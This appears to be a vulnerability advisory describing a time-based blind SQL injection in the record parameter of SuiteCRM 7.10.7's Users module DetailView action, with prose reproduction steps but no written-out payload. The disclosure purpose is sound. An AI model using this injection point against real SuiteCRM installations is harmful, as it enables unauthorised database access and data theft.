SuiteCRM SQL Injection Vulnerability in Users Module DetailView Action
Vulnerability
A time-based SQL injection vulnerability has been identified in SuiteCRM version 7.10.7. The issue resides in the record parameter of the Users module's DetailView action, allowing authenticated attackers to manipulate database queries. By appending SQL code to the record parameter in GET requests to the index.php endpoint, attackers can extract sensitive database information using time-based blind SQL injection techniques.
Impact
Exploitation of this vulnerability allows for time-based blind SQL injection, where an attacker can manipulate SQL queries and potentially access or modify sensitive database information.
Reproduction
To reproduce this vulnerability, log into SuiteCRM 7.10.7 and navigate to the Users module. Once in the DetailView action, add a crafted SQL payload to the record parameter of the URL. The payload should be designed to exploit the SQL injection vulnerability, such as by using a time-based injection technique that causes a delay in the response, indicating successful exploitation.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.